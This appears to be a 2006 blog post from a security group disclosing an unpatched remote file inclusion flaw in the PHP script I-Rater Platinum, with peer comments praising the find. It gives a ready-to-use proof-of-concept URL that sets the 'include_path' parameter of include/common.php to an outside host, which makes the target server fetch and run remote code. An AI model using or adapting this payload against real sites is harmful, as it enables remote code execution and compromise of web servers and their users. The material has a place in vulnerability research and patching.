by r0t,der4444,cembo,VietMafia

Thursday, April 20, 2006

I-Rater Platinum - Remote File Inclusion Vuln

=================================
developer's site: www.i-rater.com
script: I-Rater Platinum
risk: critical
status: unpatched
discovered by: VietMafia
=================================

Vuln. Description:

This flaw is due to an input validation error in the "include/common.php"(line 3,4) that does not validate the "include_path" variable properly. Remote attackers can include
malicious scripts and execute arbitrary commands with the privileges of the web server

PoC:

http://[target]/[path]/include/common.php?
include_path=http://unsecured-systems.com/forum/

4 Comments:

Blogger r0t told...

nice work bro! keep it comming!

7:50 AM

 
Blogger VietMafia told...

thanks r0t,

it can't be compared to your works!!!!

7:55 AM

 
Blogger r0t told...

he he.. of course you can...:)

10:11 AM

 
Blogger cembo told...

Good work!

1:35 PM

 

Post a Comment

<< Home

 
Copyright (c) 2006 Pridels Sec Crew